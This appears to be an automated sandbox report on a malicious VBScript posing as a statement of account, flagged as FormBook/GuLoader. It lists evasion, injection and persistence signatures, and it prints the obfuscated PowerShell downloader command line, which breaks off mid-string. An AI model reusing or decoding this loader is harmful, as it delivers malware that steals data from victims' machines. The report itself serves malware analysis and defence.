Windows Analysis Report
Statement_of_account.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 6776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmil liY NarkPTilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/InterhUncoeHaor .aRestrv Do eyPaleoeWagoqCrys .uHpsteiAlt ipU aarmS,eeeFilt en N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHov